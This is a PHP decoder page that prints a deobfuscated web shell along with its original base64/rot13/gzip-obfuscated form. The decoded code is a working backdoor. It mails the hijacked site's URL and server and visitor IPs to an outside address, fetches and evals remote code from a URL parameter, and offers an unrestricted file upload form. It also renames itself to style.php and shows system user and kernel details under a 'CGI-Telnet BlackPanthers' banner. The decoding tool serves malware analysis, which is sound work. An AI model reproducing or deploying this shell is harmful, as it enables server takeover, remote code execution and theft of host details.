Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(str_rot13(base64_decode('rRh4ZtpV8vO6yv9urPgidgMSadZbCa/1C8fc2sEHOEp..

Decoded Output download

set_time_limit(0);
error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Setoran Shells 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF BlackPanthers";}
else {$security= "SAFE_MODE = ON Bad";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}else{
$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'].'/'.'style.php';
rename($source, $desti);
}
    $site = $_GET['url'];
    $cek = file_get_contents("$site");
    eval(gzinflate(base64_decode($cek)));
    echo "<title>anaLTEAM</title><br>";
    if(isset($_GET['cek'])){
    echo "Simple Injektor</br></br>"; 
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF anaLTEAM";}
else {$security= "SAFE_MODE : ON Bad";}
echo "<font size=5 color=yellow>anaLTEAM<br>";
echo "<font size=3 color=white>Status : Cogiendo.<br><br>";
echo "<font size=2 color=red><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#64D300><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#64D300><b>Uname : ".php_uname()."</b><br>";
}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }
}
if(isset($_GET['colek'])){
echo '<html><head><title>Upload files</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
}
?>
<html>
<head>
<title>BlackPanthers</title>
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#009900"><b>CGI-Telnet BlackPanthers Team Connected to the server</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
</font></td>
</tr>
</table>
<font color="#009900" size="3">
    <body bgcolor=black>
	<pre><font color="#ff0000"> _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 2.0

</font><font color="#FF0000">                      ______             </font><font color="#AE8300"> 2019, BLACK-P Team</font><font color="#FF0000">
                   .-&quot;      &quot;-.
                  /   BlackP                    |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \</font><font color="#009900">_______</font><font color="#FF0000">\</font><font color="#009900">__</font><font color="#FF0000">|*EVIL*|</font><font color="#009900">__</font><font color="#FF0000">/</font><font color="#009900">_______________________
</font><font color="#FF0000"> (_)</font><font color="#009900">@8@8</font><font color="#FF0000">{}</font><font color="#009900">&lt;________</font><font color="#FF0000">|-\MASTER/-|</font><font color="#009900">________________________&gt;</font><font color="#FF0000">
        )_/        \          /
       (@           `--------`
             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
<code>
<form name="f" method="POST" action="admin">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
    <script language="JavaScript">
    var text ="<b>I'm<b> <i>just a creature who always wanted to learn, I'm not a </i><b>HACKER</b>.<i> I'm also not a destroyer !!! <br><b>I just wanted to show the ugliness of YOUR own system that you be not careless </b></i>..</br><b> I HOPE YOU GOT LOVE </b>:)";
    var delay=50;
    var currentChar=5;
    var destination="[none]";
    function type()
    {
    //if (document.all)
    {
    var dest=document.getElementById(destination);
    if (dest)// && dest.innerHTML)
    {
    dest.innerHTML=text.substr(0, currentChar)+"<blink>_</blink>"; currentChar++;
    if (currentChar>text.length)
    {
    currentChar=1;
    setTimeout("type()", 5000);
    }
    else
    {
    setTimeout("type()", delay);
    }
    }
    }
    }
    function startTyping(textParam, delayParam, destinationParam)
    {
    text=textParam;
    delay=delayParam;
    currentChar=5;
    destination=destinationParam; type();
    }
    </script> <b>
    <div 0px="" 12px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none; color: #00ff00; text-align: center; font-family: arial; font-size: 30px"></div></b> <script language="JavaScript"> javascript:startTyping(text, 50, "textDestination"); </script> 
    </head>
    </html>

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(str_rot13(base64_decode('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'))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 1a8378d2b0fe84528a307f0b32111faa
Eval Count 1
Decode Time 54 ms